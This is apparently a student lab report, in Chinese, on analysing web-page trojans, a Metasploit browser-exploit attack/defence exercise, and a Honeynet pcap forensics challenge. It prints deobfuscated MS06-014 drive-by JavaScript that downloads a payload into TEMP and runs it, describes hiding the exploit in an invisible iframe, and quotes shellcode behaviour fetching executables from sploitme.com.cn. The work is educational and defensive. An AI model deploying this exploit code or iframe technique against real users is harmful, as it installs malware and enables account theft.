固然憑藉這些分析咱們仍是很可貴出這些軟件是幹什麼的,不過能夠借用 360 軟件來分析一下,這個程序是一個盜號木馬
圖片描述

其它19個程序分析過程同理,運行結果基本上大同小異,能夠肯定這20個程序均是盜號木馬

問題解答
試述你是如何一步步地從所給的網頁中獲取最後的真實代碼的?
見上述分析過程

網頁和 JavaScript 代碼中都使用了什麼樣的加密方法?你是如何解密的?
使用了8進制,16進制,js 混淆,xxtea + base64加密,二進制機器碼加密等。解密過程見上述分析過程

從解密後的結果來看,攻擊者構造的網頁木馬利用了哪些安全漏洞?

  • MS06-014網馬
    • 攻擊MS06-014安全漏洞
    • MDAC RDS.Dataspace ActiveX控件遠程代碼執行漏洞
  • 暴風影音網馬
    • 攻擊CVE-2007-4816安全漏洞
    • 暴風影音2 mps.dll組件多個緩衝區溢出漏洞
  • PPStream網馬
    • 攻擊CVE-2007-4748安全漏洞
    • PPStream 堆棧溢出
  • 百度搜霸網馬
    • 攻擊CVE-2007-4105安全漏洞
    • 百度搜霸ActiveX控件遠程代碼執行漏洞

解密後發現了多少個可執行文件?這些可執行文件中有下載器麼?若是有,它們下載了哪些程序?這些程序又是起什麼做用的?(請舉例分析)
解密後發現了4個可執行文件,這四個可執行文件內容相同,都是下載器,下載了20個程序。這些程序的做用是盜取用戶的帳號。

2.3 攻防對抗實踐: Web 瀏覽器滲透攻擊攻防對抗

攻擊方使用 Metasploit 構造出攻擊至少兩個不一樣 Web 瀏覽端軟件安全漏洞的滲透攻擊代碼,並進行混淆處理組裝成一個URL連接,經過具備欺騙性的電子郵件發送給防守方。
防守方對電子郵件中的掛馬連接進行提取、解混淆分析,嘗試恢復出滲透攻擊代碼的原始形態, 並分析出這些滲透代碼都是攻擊哪些 Web 瀏覽端軟件的哪些安全漏洞。
雙方撰寫詳細實驗分析報告, 對攻防對抗過程進行總結。

這個實驗所使用攻擊機爲 kail,靶機爲 win 2kS
攻擊方
構建漏洞的過程如第一個實踐所示,這裏不贅述了。
圖片描述
這裏編寫一個測試網頁 test.html(比較簡單),使用iframe標籤將漏洞連接嵌入到咱們的測試網頁中,這樣當用戶訪問測試網頁時候,會一併顯示這個頁面。同時將高度和寬度設置爲0,這樣用戶就看不見咱們嵌入的這個頁面
將 test.html 放入 /var/www/html/ 中,同時打開 apache 服務
圖片描述

保存,當用戶訪問 http://192.168.200.10/test.html時,就會創建起會話
圖片描述

圖片描述
攻擊成功

防守方
首先使用 freshow 分析所給連接,發現裏面嵌套有另外一個 URL ,推測應該就是 shellcode 的連接
圖片描述

檢查這個連接
圖片描述
發現該網頁爲了防止被殺毒軟件查殺,使用了大量的空白和間隔
去除空白與間隔後(js 解密),代碼以下

< html > < head > < title > < /title><script language="javascript">function NMTecHqTwlncd(o,n){var r=null;try{eval("r=o.CreateObject(n)")}catch(e){}if(!r){try{eval("r=o.CreateObject(n,'')")}catch(e){}}if(!r){try{eval("r=o.CreateObject(n,'','')")}catch(e){}}if(!r){try{eval("r=o.GetObject('',n)")}catch(e){}}if(!r){try{eval("r=o.GetObject(n,'')")}catch(e){}}if(!r){try{eval("r=o.GetObject(n)")}catch(e){}}return(r)}function uuAbyFHRrcPdFfbNYhEOQzLI(a){var s=NMTecHqTwlncd(a,"WScript.Shell");var o=NMTecHqTwlncd(a,"ADODB.Stream");var e=s.Environment("Process");var url=document.location+'/payload
';var xml=null;var bin=e.Item("TEMP")+"XHfsyzhkBIAE.exe";var dat;try{xml=new XMLHttpRequest()}catch(e){try{xml=new ActiveXObject("Microsoft.XMLHTTP")}catch(e){xml=new ActiveXObject("MSXML2.ServerXMLHTTP")}}if(!xml){return(0)}xml.open("GET",url,false);xml.send(null);dat=xml.responseBody;o.Type=1;o.Mode=3;o.Open();o.Write(dat);o.SaveToFile(bin,2);s.Run(bin,0)}function BeMvp(){var i=0;var t=new Array(' {
    BD96C556 - 65A3 - 11D0 - 983A - 00C04FC29E36
}
',' {
    BD96C556 - 65A3 - 11D0 - 983A - 00C04FC29E30
}
',' {
    7F5B7F63 - F06F - 4331 - 8A26 - 339E03C0AE3D
}
',' {
    6e32070a - 766d - 4ee6 - 879c - dc1fa91d2fc3
}
',' {
    6414512B - B978 - 451D - A0D8 - FCFDF33E833C
}
',' {
    06723E09 - F4C2 - 43c8 - 8358 - 09FCD1DB0766
}
',' {
    639F725F - 1B2D - 4831 - A9FD - 874847682010
}
',' {
    BA018599 - 1DB3 - 44f9 - 83B4 - 461454C84BF8
}
',' {
    D0C07D56 - 7C69 - 43F1 - B4A0 - 25F5A11FAB19
}
',' {
    E8CCCDDF - CA28 - 496b - B050 - 6C07C962476B
}
',' {
    AB9BCEDD - EC7E - 47E1 - 9322 - D4A210617116
}
',' {
    0006F033 - 0000 - 0000 - C000 - 000000000046
}
',' {
    0006F03A - 0000 - 0000 - C000 - 000000000046
}
',null);while(t[i]){var a=null;if(t[i].substring(0,1)==' {
    '){a=document.createElement("object");a.setAttribute("classid","clsid:"+t[i].substring(1,t[i].length-1))}else{try{a=new ActiveXObject(t[i])}catch(e){}}if(a){try{var b=NMTecHqTwlncd(a,"WScript.Shell");if(b){uuAbyFHRrcPdFfbNYhEOQzLI(a);return(0)}}catch(e){}}i++}}</script></head><body onload='
    BeMvp()
    '>EPboqnoNqNOztTdS</body></html>

能夠看到調用了 document.location 加載了 payload,而且下一行中後面跟了一個可執行文件 XHfsyzhkBIAE.exe;。下面給出的那個數組比較可疑了,上網搜索果真是 ms06-14 漏洞。

2.4 取證分析挑戰實踐: Web 瀏覽器遭遇攻擊

經過分析如下給出的網絡記錄 pcap 文件(suspicious-time.pcap Sha1 : 1f 100c8a4996fafa80d47202881a17796941fd337), 回答如下問題並撰寫實踐分析報告。

  1. 列出在捕獲文件中的應用層協議類型, 你認爲攻擊是針對哪一個或哪些協議的?
  2. 列出捕獲文件中的 IP 地址、主機名和域名。從這些信息中你能猜出攻擊場景的環境配置狀況嗎?
  3. 列出捕獲文件中的全部網頁頁面, 其中哪些頁面包含了可疑的、多是惡意的
    JavaScript 腳本代碼?誰在鏈接這些頁面?請描述惡意網頁的攻擊目的?
  4. 請給出攻擊者執行攻擊動做的概要描述。
  5. 攻擊者引入了哪些技巧給你的分析帶來了困難,請提供在以前問題中識別的惡意
    JavaScript 腳本內容,並對它們進行解碼或解密。
  6. 攻擊者的目標是哪一個操做系統,哪些應用軟件,哪些安全漏洞?如何阻止這些攻擊?
  7. Shellcode 執行了哪些動做?請列出 Shellcode 的 MD5,並比較它們之間的差別?
  8. 在攻擊場景中有二進制可執行惡意代碼參與嗎?它們的目的是什麼?

列出在捕獲文件中的應用層協議類型, 你認爲攻擊是針對哪一個或哪些協議的?
使用 chaosreader 生成文件
圖片描述
圖片描述

查看一下數據包,沒有針對 ICMP,Bootps,Netbios 或 DNS 協議的攻擊。針對的協議應該是 HTTP。

列出捕獲文件中的 IP 地址、主機名和域名。從這些信息中你能猜出攻擊場景的環境配置狀況嗎?
使用命令for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort –u

圖片描述
Rapidshare.com.eyu32.ru網站應該僞造了一個知名品牌,攻擊者可能會利用它對用戶進行網上釣魚。ip 地址爲 192.168.56.50
sploitme.com.cn,該名稱實際上暗示着某些惡意或遊戲(惡意的),網站是不存在的(未找到 DNS 域名)。ip 地址爲 192.168.56.52
shop.honeynet.sg 應該是一個購物網站的服務器,是正常的。ip地址爲 192.168.56.51。
honeynet.org 是另外一個知名的組織網站,應該是正常的
剩下的谷歌分析網站應該也是正常的

使用命令tshark -r suspicious-time.pcap | grep 'NB.*20\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$10}' | sort -u篩選出 NBNS 協議,咱們知道 NBNS 協議的做用是基於 NetBIOS 名稱訪問的網絡上提供主機名和地址映射方法,也就是提供主機名稱。
圖片描述
這四個不一樣 ip 地址的主機分別映射的主機名是相同的
使用命令tshark -r suspicious-time.pcap | grep 'NB.*1e\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u
圖片描述
這四個 ip 地址的主機在同一個工做組
而經過 arp 協議篩選咱們能夠發現,這四個 ip 地址所對應的 mac 地址是不一樣的
圖片描述

經過上述分析,能夠推斷這四臺主機相同的(或者克隆的),但具備四個網卡,那麼攻擊場景的環境應該是在 VM 環境中。
具體以下:服務:10.0.2.2, 10.0.3.2, 10.0.4.2, 10.0.5.2 (DHCP 服務和網關),192.168.1.1 (DNS 服務)。
受害者:10.0.2.15, 10.0.3.15, 10.0.4.15,10.0.5.15
模擬被侵入主機:192.168.56.50 ( 「rapidshare.com.eyu32.ru」)、192.168.56.51 (「shop.honeynet.sg」)。
攻擊者:192.168.56.52 ( 「sploitme.com.cn」)。

列出捕獲文件中的全部網頁頁面, 其中哪些頁面包含了可疑的、多是惡意的
JavaScript 腳本代碼?誰在鏈接這些頁面?請描述惡意網頁的攻擊目的?

打開session_0006.part_01.html發現了以下界面,這應該是一個釣魚網站,顯然是惡意建立的對應的就是rapidshare.com.eyu32.ru/login.php
圖片描述

那咱們找sploitme.com.cn,發現 404 NotFound 了,這個對應文件session_0007.part_02.html
圖片描述

下面找shop.honeynet.sg/catalog/,對應文件session_0032.part_01.html
圖片描述

請給出攻擊者執行攻擊動做的概要描述。
攻擊者將惡意 javascript 代碼注入指向sploitme.com.cn/?click=X的隱藏iframe。當訪問者查看這些頁面時,它們首先被重定向到sploitme.com.cn/fg/show.php?s=X,該頁面經過302 FOUND標頭重定向到僞造的404頁面(數據包6三、17四、366)。而後在該頁面中,檢查用戶代理字符串,着陸點和其餘參數,並(show.php)發出另外一個javascript代碼,該代碼嘗試各類攻擊以在受害者的計算機中執行代碼。若是任何漏洞利用成功,則客戶端的計算機將下載並執行位於sploitme.com.cn/fg/load.php?e=X的文件,惡意軟件訪問www.honeynet.org

攻擊者引入了哪些技巧給你的分析帶來了困難,請提供在以前問題中識別的惡意
JavaScript 腳本內容,並對它們進行解碼或解密。

  • javaScript 混淆與加密,以下圖所示:
    圖片描述

  • 惡意頁面假裝成看起來像404頁面:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <meta name="robots" content="noindex"> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /fg/show.php was not found on this server.</p> <script language='JavaScript'> [some script] </script> <noscript></noscript> </body></html>
  • 發送給受害者的漏洞利用程序取決於受害者使用的瀏覽器,這使得肯定漏洞利用者變得更加困難

  • 該漏洞利用程序不容許同一客戶端訪問兩次。

攻擊者的目標是哪一個操做系統,哪些應用軟件,哪些安全漏洞?如何阻止這些攻擊?
首先咱們追蹤TCP 142號流,能夠查看到這是一個針對Windows XP系統的,主要攻擊目標是IE瀏覽器漏洞和含有ActiveX組件漏洞的。
圖片描述
能夠經過修補操做系統和應用程序,進行按期更新以及使用「 ActiveX殺手」或徹底使用其餘Web瀏覽器來防止攻擊。

Shellcode 執行了哪些動做?請列出 Shellcode 的 MD5,並比較它們之間的差別?
Shellcode獲取系統臨時文件路徑,加載urlmon.dll,從 URL http://sploitme.com.cn/fg/load.php?e=1檢索可執行文件,而後執行它。 Shellcode 之間的惟一區別是對load.php腳本的請求中的e變量,該變量指定發送惡意軟件可執行文件。

在攻擊場景中有二進制可執行惡意代碼參與嗎?它們的目的是什麼?
有。目的是在受害者主機上經過 Internet Explorer 加載 www.honeynet.org

3.學習中遇到的問題及解決

  • 問題1:遇到了一大堆問題,好比如何利用 Metasploit 進行混淆,好比最後一個實踐如何分析等等
  • 問題1解決方案:沒有找到很好的解決方案,該不會的仍是不會

4. 學習感想和體會

此次實驗太難了,超出了本身的能力範圍

參考資料

網絡攻防技術與實踐

相關文章
相關標籤/搜索